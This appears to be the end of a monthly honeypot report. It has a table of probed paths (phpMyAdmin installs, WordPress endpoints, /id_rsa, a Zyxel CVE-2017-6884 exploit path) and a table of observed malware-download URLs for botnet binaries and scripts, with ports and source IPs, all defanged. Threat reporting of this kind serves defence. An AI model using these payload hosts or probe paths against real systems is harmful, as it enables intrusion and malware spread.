/nagiosxi/images/loginsplash.png phpMyAdmin - -
/openserver/phpmyadmin/ phpMyAdmin - -
/p/m/a/ phpMyAdmin - -
/php-my-admin/ phpMyAdmin - -
/php-myadmin/ phpMyAdmin - -
/phpMyAdmin-2.2.3/ phpMyAdmin - -
/phpMyAdmin-2.2.6/ phpMyAdmin - -
/phpMyAdmin-2.5.1/ phpMyAdmin - -
/phpMyAdmin-2.5.4/ phpMyAdmin - -
/phpMyAdmin-2.5.5-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.5/ phpMyAdmin - -
/phpMyAdmin-2.5.6-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.6-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.6/ phpMyAdmin - -
/phpMyAdmin-2.5.7-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.7/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc3/ phpMyAdmin - -
/phpMyAdmin-2.6.0/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.2/ phpMyAdmin - -
/phpMyAdmin-2.6.3-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.3-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl4/ phpMyAdmin - -
/phpMyAdmin-2.6.4-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.4/ phpMyAdmin - -
/phpMyAdmin-2.7.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.7.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.7.0/ phpMyAdmin - -
/phpMyAdmin-2.8.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.1/ phpMyAdmin - -
/phpMyAdmin-2.8.0.2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.3/ phpMyAdmin - -
/phpMyAdmin-2.8.0.4/ phpMyAdmin - -
/phpMyAdmin-2.8.0/ phpMyAdmin - -
/phpMyAdmin-2.8.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.1/ phpMyAdmin - -
/phpMyAdmin-2.8.2/ phpMyAdmin - -
/phpMyAdmin-2/ phpMyAdmin - -
/phpMyAdmin2/ phpMyAdmin - -
/phpmanager/ phpMyAdmin - -
/phpmy-admin/ phpMyAdmin - -
/script - - -
/sqlmanager/ SQLiteManager - -
/sqlweb/ SQL - -
/systemInfo Unknown - -
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php SQLiteManager - -
/webadmin/ SQL - -
/webdb/ SQL - -
/websql/ SQL - -
hxxp://www[.]msftncsi[.]com/ncsi[.]txt Unauthorized Relay - -
/.html - - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo.php Unauthorized Relay - -
/id_rsa ssh - -
/smb_scheduler/ SimBankSchedulerServer - https://docuri.com/download/smb-server-install-guide_59c1dfd7f581710b2869684b_pdf
/user// - - -
/user//wp-json/wp/v2/users/ WordPress - -
/user/wp-login.php WordPress - -
/user/xmlrpc.php WordPress - -
/Nmap/folder/check1562208120 Nmap - -
/NmapUpperCheck1562208120 Nmap - -
/nmaplowercheck1562208120 Nmap - -
/user/soapCaller.bs Morfeus Fucking Scanner - https://kaworu.jpn.org/kaworu/2008-12-27-1.php
hxxp://160[.]16[.]145[.]183/QUERY/en-us/msdn/ Unauthorized Relay - -
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup Zyxel CVE-2017-6884 https://www.exploit-db.com/exploits/41782
/myadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php phpMyAdmin - -
/pma/scripts/setup.php phpMyAdmin - -


<Malware downloads>

Destination port   Download URL   Source IP
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 167[.]99[.]99[.]163
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]65[.]214
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]4[.]33
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 138[.]68[.]58[.]92
52869 hxxp://91[.]209[.]70[.]174/Corona[.]mips 185[.]244[.]25[.]92
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
52869 hxxp://174[.]128[.]226[.]101/kr 198[.]23[.]214[.]17
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 113[.]141[.]72[.]248
60001 hxxp:/\/185[.]244[.]25[.]185/bins/Jaws[.]sh 109[.]238[.]12[.]68
6381 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 178[.]62[.]220[.]251
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
6380 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
6378 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 178[.]62[.]112[.]14 105[.]156[.]57[.]15
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
37215 hxxp://195[.]201[.]235[.]173 174[.]138[.]5[.]118
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 174[.]128[.]226[.]101 107[.]173[.]222[.]169
37215 199[.]38[.]245[.]220 68[.]195[.]29[.]77
60001 hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 185[.]172[.]110[.]226
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
5500 hxxp:/\/178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
5555 hxxp://185[.]244[.]25[.]241/k 94[.]192[.]84[.]33
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/mpsl 104[.]251[.]122[.]37
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 58[.]82[.]212[.]148
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 221[.]182[.]115[.]133
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 223[.]203[.]201[.]254
37215 178[.]62[.]114[.]122 79[.]24[.]106[.]146
37215 206[.]189[.]17[.]158 46[.]101[.]255[.]19
37215 206[.]189[.]170[.]165 212[.]19[.]119[.]8
37215 89[.]46[.]223[.]195 162[.]252[.]200[.]7
37215 89[.]46[.]223[.]195 79[.]53[.]81[.]185
52869 hxxp://168[.]235[.]89[.]216/IDJAPbins[.]sh 134[.]209[.]114[.]98
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]153[.]180[.]246
60001 hxxp:/\/185[.]244[.]25[.]171/bins/Jaws[.]sh 109[.]238[.]12[.]68
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 219[.]77[.]18[.]91
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
5555 hxxp://134[.]209[.]183[.]3/z[.]sh 134[.]209[.]18[.]235
5555 hxxp://185[.]244[.]25[.]24/k 151[.]29[.]5[.]219
5555 hxxp://185[.]244[.]25[.]241/k 101[.]51[.]5[.]136
5555 hxxp://185[.]244[.]25[.]241/k 103[.]3[.]224[.]190
5555 hxxp://185[.]244[.]25[.]241/k 104[.]205[.]11[.]120
5555 hxxp://185[.]244[.]25[.]241/k 109[.]116[.]204[.]63
5555 hxxp://185[.]244[.]25[.]241/k 112[.]137[.]35[.]5
5555 hxxp://185[.]244[.]25[.]241/k 116[.]251[.]1[.]72
5555 hxxp://185[.]244[.]25[.]241/k 122[.]138[.]100[.]6
5555 hxxp://185[.]244[.]25[.]241/k 130[.]0[.]189[.]117
5555 hxxp://185[.]244[.]25[.]241/k 151[.]63[.]25[.]250
5555 hxxp://185[.]244[.]25[.]241/k 162[.]40[.]137[.]97
5555 hxxp://185[.]244[.]25[.]241/k 171[.]13[.]150[.]58
5555 hxxp://185[.]244[.]25[.]241/k 171[.]234[.]115[.]32
5555 hxxp://185[.]244[.]25[.]241/k 174[.]49[.]67[.]132
5555 hxxp://185[.]244[.]25[.]241/k 175[.]139[.]77[.]69
5555 hxxp://185[.]244[.]25[.]241/k 176[.]223[.]72[.]122
5555 hxxp://185[.]244[.]25[.]241/k 177[.]105[.]116[.]22
5555 hxxp://185[.]244[.]25[.]241/k 177[.]71[.]59[.]193
5555 hxxp://185[.]244[.]25[.]241/k 180[.]130[.]153[.]49
5555 hxxp://185[.]244[.]25[.]241/k 182[.]253[.]65[.]183
5555 hxxp://185[.]244[.]25[.]241/k 188[.]217[.]185[.]71
5555 hxxp://185[.]244[.]25[.]241/k 188[.]49[.]46[.]158
5555 hxxp://185[.]244[.]25[.]241/k 190[.]12[.]177[.]88
5555 hxxp://185[.]244[.]25[.]241/k 191[.]162[.]43[.]35
5555 hxxp://185[.]244[.]25[.]241/k 197[.]227[.]172[.]131
5555 hxxp://185[.]244[.]25[.]241/k 27[.]76[.]50[.]21
5555 hxxp://185[.]244[.]25[.]241/k 37[.]135[.]73[.]41
5555 hxxp://185[.]244[.]25[.]241/k 37[.]182[.]29[.]57
5555 hxxp://185[.]244[.]25[.]241/k 39[.]77[.]231[.]147
5555 hxxp://185[.]244[.]25[.]241/k 42[.]2[.]209[.]84
5555 hxxp://185[.]244[.]25[.]241/k 42[.]200[.]116[.]26
5555 hxxp://185[.]244[.]25[.]241/k 42[.]52[.]170[.]23
5555 hxxp://185[.]244[.]25[.]241/k 46[.]152[.]121[.]109
5555 hxxp://185[.]244[.]25[.]241/k 70[.]31[.]239[.]253
5555 hxxp://185[.]244[.]25[.]241/k 73[.]89[.]44[.]194
5555 hxxp://185[.]244[.]25[.]241/k 77[.]76[.]180[.]169
5555 hxxp://185[.]244[.]25[.]241/k 78[.]101[.]87[.]97
5555 hxxp://185[.]244[.]25[.]241/k 79[.]111[.]33[.]39
5555 hxxp://185[.]244[.]25[.]241/k 92[.]98[.]237[.]36
5555 hxxp://185[.]70[.]105[.]35/teqbins[.]sh 61[.]216[.]81[.]44
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://209[.]97[.]163[.]186/c 112[.]170[.]69[.]163
5555 hxxp://68[.]183[.]39[.]48/icy[.]sh 182[.]254[.]168[.]229
5555 hxxp://87[.]120[.]254[.]184/curl1 185[.]164[.]72[.]227
5555 hxxp://87[.]120[.]254[.]184/curl1 80[.]82[.]70[.]43
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 119[.]253[.]84[.]102
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 221[.]230[.]132[.]58
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
8000 hxxp://209[.]141[.]40[.]213/avtech 209[.]52[.]149[.]41
8000 hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips 159[.]203[.]18[.]21
8060 hxxp://fid[.]hognoob[.]se/download[.]exe 165[.]56[.]0[.]30
8080 hxxp://134[.]209[.]183[.]3/akbins/mpsl[.]akira[.]ak 134[.]209[.]28[.]200
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 109[.]124[.]148[.]167
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 121[.]179[.]46[.]82
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 124[.]133[.]108[.]34
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 148[.]63[.]18[.]12
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 182[.]34[.]123[.]90
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 213[.]192[.]56[.]195
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 222[.]218[.]220[.]101
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 46[.]105[.]209[.]48
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 66[.]168[.]88[.]53
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 83[.]29[.]229[.]22
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 93[.]100[.]110[.]69
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://hulo[.]r00ts[.]online/[.]config/Lrep 122[.]116[.]216[.]224
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 118[.]232[.]136[.]122
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 88[.]249[.]249[.]27
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 3[.]213[.]101[.]190
9200 hxxp://216[.]176[.]179[.]106:9090/26006\ 202[.]109[.]143[.]110
9888 hxxp://fid[.]hognoob[.]se/download[.]exe 185[.]48[.]149[.]115
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
37215 103[.]83[.]157[.]41 142[.]93[.]113[.]113
37215 104[.]248[.]93[.]159 68[.]183[.]151[.]62
37215 157[.]230[.]173[.]232 145[.]239[.]168[.]176
37215 157[.]230[.]173[.]232 37[.]6[.]230[.]115
37215 157[.]230[.]173[.]232 79[.]107[.]238[.]19
37215 157[.]230[.]173[.]232 79[.]107[.]244[.]144
37215 159[.]203[.]21[.]20 77[.]42[.]104[.]114
37215 159[.]65[.]240[.]150 88[.]36[.]135[.]138
37215 159[.]89[.]38[.]57 106[.]13[.]52[.]123
37215 178[.]62[.]112[.]14 60[.]8[.]213[.]120
37215 178[.]62[.]114[.]122 151[.]30[.]69[.]79
37215 178[.]62[.]114[.]122 199[.]182[.]137[.]148
37215 178[.]62[.]114[.]122 212[.]210[.]31[.]47
37215 178[.]62[.]114[.]122 37[.]130[.]113[.]38
37215 178[.]62[.]114[.]122 79[.]12[.]199[.]206
37215 185[.]244[.]25[.]235 149[.]129[.]132[.]231
37215 185[.]244[.]25[.]235 34[.]85[.]97[.]138
37215 185[.]244[.]25[.]235 47[.]92[.]54[.]63
37215 206[.]189[.]170[.]165 151[.]24[.]171[.]42
37215 206[.]189[.]170[.]165 151[.]30[.]33[.]254
37215 206[.]189[.]170[.]165 151[.]30[.]62[.]96
37215 206[.]189[.]170[.]165 151[.]32[.]113[.]220
37215 206[.]189[.]170[.]165 151[.]32[.]61[.]221
37215 206[.]189[.]170[.]165 151[.]52[.]39[.]144
37215 206[.]189[.]170[.]165 151[.]64[.]117[.]217
37215 206[.]189[.]170[.]165 212[.]19[.]112[.]212
37215 206[.]189[.]170[.]165 212[.]19[.]116[.]205
37215 206[.]189[.]170[.]165 79[.]23[.]98[.]90
37215 206[.]189[.]170[.]165 79[.]47[.]184[.]216
37215 206[.]189[.]170[.]165 79[.]52[.]2[.]81
37215 209[.]141[.]43[.]15 220[.]127[.]239[.]7
37215 209[.]97[.]136[.]57 85[.]134[.]12[.]144
37215 37[.]49[.]225[.]230 37[.]202[.]111[.]58
37215 37[.]49[.]225[.]230 37[.]202[.]127[.]16
37215 37[.]49[.]225[.]230 46[.]185[.]139[.]32
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 89[.]190[.]159[.]189 151[.]40[.]20[.]117
37215 89[.]190[.]159[.]189 151[.]49[.]112[.]101
37215 89[.]190[.]159[.]189 152[.]171[.]67[.]142
37215 89[.]190[.]159[.]189 188[.]136[.]243[.]230
37215 89[.]190[.]159[.]189 79[.]46[.]88[.]134
37215 89[.]190[.]159[.]189 80[.]15[.]216[.]26
37215 89[.]34[.]26[.]202 174[.]138[.]0[.]191
37215 89[.]46[.]223[.]195 162[.]255[.]122[.]178
37215 hxxp://213[.]166[.]69[.]64 174[.]138[.]5[.]118
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]101[.]105[.]192
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 188[.]166[.]48[.]241
52869 hxxp://213[.]166[.]69[.]64/akbins/mips[.]akirag 174[.]138[.]0[.]191
55555 ftp -r 185[.]172[.]110[.]246
60001 hxxp://178[.]33[.]181[.]23/infect 167[.]86[.]77[.]222
60001 hxxp://178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
60001 hxxp://185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 45[.]8[.]159[.]175
60001 hxxp://185[.]244[.]25[.]241/b/arm7 1[.]4[.]188[.]23
60001 hxxp://185[.]244[.]25[.]241/b/arm7 101[.]108[.]98[.]16
60001 hxxp://185[.]244[.]25[.]241/b/arm7 103[.]133[.]64[.]68
60001 hxxp://185[.]244[.]25[.]241/b/arm7 104[.]205[.]11[.]120
60001 hxxp://185[.]244[.]25[.]241/b/arm7 108[.]30[.]142[.]74
60001 hxxp://185[.]244[.]25[.]241/b/arm7 112[.]119[.]70[.]4
60001 hxxp://185[.]244[.]25[.]241/b/arm7 112[.]243[.]249[.]179
60001 hxxp://185[.]244[.]25[.]241/b/arm7 113[.]231[.]104[.]95
60001 hxxp://185[.]244[.]25[.]241/b/arm7 114[.]203[.]95[.]52
60001 hxxp://185[.]244[.]25[.]241/b/arm7 115[.]96[.]156[.]121
60001 hxxp://185[.]244[.]25[.]241/b/arm7 118[.]81[.]99[.]146
60001 hxxp://185[.]244[.]25[.]241/b/arm7 120[.]1[.]136[.]29
60001 hxxp://185[.]244[.]25[.]241/b/arm7 125[.]26[.]203[.]175
60001 hxxp://185[.]244[.]25[.]241/b/arm7 151[.]70[.]197[.]241
60001 hxxp://185[.]244[.]25[.]241/b/arm7 163[.]158[.]203[.]173
60001 hxxp://185[.]244[.]25[.]241/b/arm7 175[.]151[.]238[.]175
60001 hxxp://185[.]244[.]25[.]241/b/arm7 178[.]221[.]57[.]209
60001 hxxp://185[.]244[.]25[.]241/b/arm7 182[.]180[.]121[.]222
60001 hxxp://185[.]244[.]25[.]241/b/arm7 185[.]18[.]46[.]110
60001 hxxp://185[.]244[.]25[.]241/b/arm7 188[.]49[.]46[.]158
60001 hxxp://185[.]244[.]25[.]241/b/arm7 189[.]26[.]196[.]203
60001 hxxp://185[.]244[.]25[.]241/b/arm7 190[.]221[.]92[.]136
60001 hxxp://185[.]244[.]25[.]241/b/arm7 191[.]243[.]231[.]64
60001 hxxp://185[.]244[.]25[.]241/b/arm7 196[.]229[.]230[.]251
60001 hxxp://185[.]244[.]25[.]241/b/arm7 197[.]0[.]168[.]186
60001 hxxp://185[.]244[.]25[.]241/b/arm7 2[.]89[.]166[.]11
60001 hxxp://185[.]244[.]25[.]241/b/arm7 219[.]139[.]232[.]108
60001 hxxp://185[.]244[.]25[.]241/b/arm7 222[.]72[.]116[.]147
60001 hxxp://185[.]244[.]25[.]241/b/arm7 27[.]192[.]11[.]108
60001 hxxp://185[.]244[.]25[.]241/b/arm7 27[.]76[.]50[.]21
60001 hxxp://185[.]244[.]25[.]241/b/arm7 35[.]199[.]147[.]245
60001 hxxp://185[.]244[.]25[.]241/b/arm7 37[.]202[.]100[.]185
60001 hxxp://185[.]244[.]25[.]241/b/arm7 39[.]44[.]40[.]234
60001 hxxp://185[.]244[.]25[.]241/b/arm7 39[.]45[.]138[.]80
60001 hxxp://185[.]244[.]25[.]241/b/arm7 41[.]138[.]117[.]19
60001 hxxp://185[.]244[.]25[.]241/b/arm7 41[.]143[.]237[.]2
60001 hxxp://185[.]244[.]25[.]241/b/arm7 42[.]53[.]118[.]250
60001 hxxp://185[.]244[.]25[.]241/b/arm7 5[.]219[.]171[.]187
60001 hxxp://185[.]244[.]25[.]241/b/arm7 5[.]236[.]217[.]102
60001 hxxp://185[.]244[.]25[.]241/b/arm7 58[.]10[.]74[.]65
60001 hxxp://185[.]244[.]25[.]241/b/arm7 61[.]175[.]101[.]165
60001 hxxp://185[.]244[.]25[.]241/b/arm7 68[.]194[.]230[.]145
60001 hxxp://185[.]244[.]25[.]241/b/arm7 93[.]46[.]58[.]233
60001 hxxp://185[.]244[.]25[.]241/b/arm7 93[.]81[.]10[.]51
60001 hxxp://185[.]244[.]25[.]241/b/arm7 94[.]231[.]164[.]168
60001 hxxp://185[.]244[.]25[.]241/b/arm7 95[.]137[.]251[.]164
60001 hxxp://185[.]244[.]25[.]241/b/arm7 95[.]219[.]163[.]24
60001 hxxp://185[.]244[.]25[.]241/b/arm7 95[.]249[.]151[.]66

That is all for this month.